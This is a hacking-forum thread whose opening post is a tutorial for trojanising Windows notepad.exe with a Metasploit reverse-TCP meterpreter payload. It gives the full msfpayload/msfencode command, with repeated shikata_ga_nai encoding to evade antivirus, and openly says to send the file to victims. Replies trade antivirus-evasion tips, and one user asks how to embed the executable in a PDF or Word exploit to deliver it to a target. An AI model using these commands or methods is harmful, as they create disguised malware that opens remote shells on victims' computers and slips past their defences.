EvilZone
Hacking and Security => Hacking and Security => : swartz November 23, 2014, 07:07:55 PM
-
Hi everyone in my first post i will show you how to create a reverse meterpreter payload from a "clear" windows exe file and then
we will encoded to avoid most Av's. I will use shikata_ga_nai as encoder but you can use more than one encoder for bettet result
and even more you can remove all the bad chars and generate some Nop shellcode for more advance result.
To see all the msfencoders you can use the msfsncode -l command.
In this tutorial i will use the notepad.exe from windows.
Before we start i will post all the variables will be given just for the people who dont know what every variable is.
-e = selection of encode
-c = how many time we will encode are payload
-t = file format
-x = determines the executable file that is what we want to encode
-o = save the new file
First copy the notepad.exe and paste it on your kali desktop.
Ok now we open are terminal and use this code:
msfpayload windows/meterpreter/reverse_tcp LHOST=XX.XX.XX.XX LPORT=XXXX R | msfencode -e x86/shikata_ga_nai -c 30 -t exe -x
/root/Desktop/notepad.exe -o /root/Desktop/notepad2.exe
and hit enter....wait until creates the payload and encoded 30 time as we
given. If everything was right you will see a notepad2.exe file on your desktop, thats are payload. So now we can sent are payload
to the victim or upload it for more victims.
You have to use multi/hanlder exploit and dont forget to use the same options with the payload (LPORT etc).
After uploaded to online scanner as virus_total the result was 6/54 good enough for me :)
note: sometimes if you use 2 encoders it may broke the payload and you will never get the session.
With the same way you can encode every payload.
-
i have encoded my payload with various encoding like you mentioned but my payload way detected by AV......So i researched and found that its best to write your own shell in the most unique way, i think i read it on this forum!
Long Live Evilzone!!
Anyway any solution to avoid writing your own shell to avoid detection?
-
ahh metasploit ::)
-
i have encoded my payload with various encoding like you mentioned but my payload way detected by AV......So i researched and found that its best to write your own shell in the most unique way, i think i read it on this forum!
Long Live Evilzone!!
Anyway any solution to avoid writing your own shell to avoid detection?
Hi mate if after encoding your payload are still detected from AV's try to remove the bad characters and genarate some Nop shellcode as i say in my tut. Dont know why it doesnt work for you with the simple way, really works for me but if you want have a look in this video https://www.youtube.com/watch?v=0RkNm7Rdhg0 was made from me for another member who faces the same prob. Hop that helps !!
-
Learn shellcoding and write your own encoder/decoder. It's really easy when you get your assemly good.
-
this 'tut' feels borderline scraped from the metasploit website itself.....
You could also avoid the hassle almost completely and just write your own shit ;)
Even the IDSes that can detect simple shellcode still fail if you rewrite the original exploit. As for dropping meterpreter or malware I'm just gunna chuckle and say write your own crap.
Cause see theres been this nifty cause and effect, or at least a correlation, between how security systems are designed and how security pentesting is done. Metasploit and tools has made it so someone can be a 'pentester' with limited scripting skills and never write an original tool in their life and still get in. Amateur script kiddies copy these pentesters and use the exact same methods and exact same tools in the exact same ways, so security tools have evolved to stop these kinds of attacks. When was the last time you ever saw a headline saying 'we were attacked by X using undiscovered Y and tool Z stopped it!'? No? Why not? Something to think about here...
-
MSFENCODE IS NOT A WAY TO BYPASS ANTIVIRUS
-
but how do i use my custom exe in a xploit like pdf or word file, ??
as expected my custom exe is not detected by antivirus.
what would be the best way to send it to target?
-
but how do i use my custom exe in a xploit like pdf or word file, ??
as expected my custom exe is not detected by antivirus.
what would be the best way to send it to target?
If you have to ask, youre not ready to know.
Learn the basics and understand whats going on first.
-
If you have to ask, youre not ready to know.
Learn the basics and understand whats going on first.
Thanks you are very helpful hahah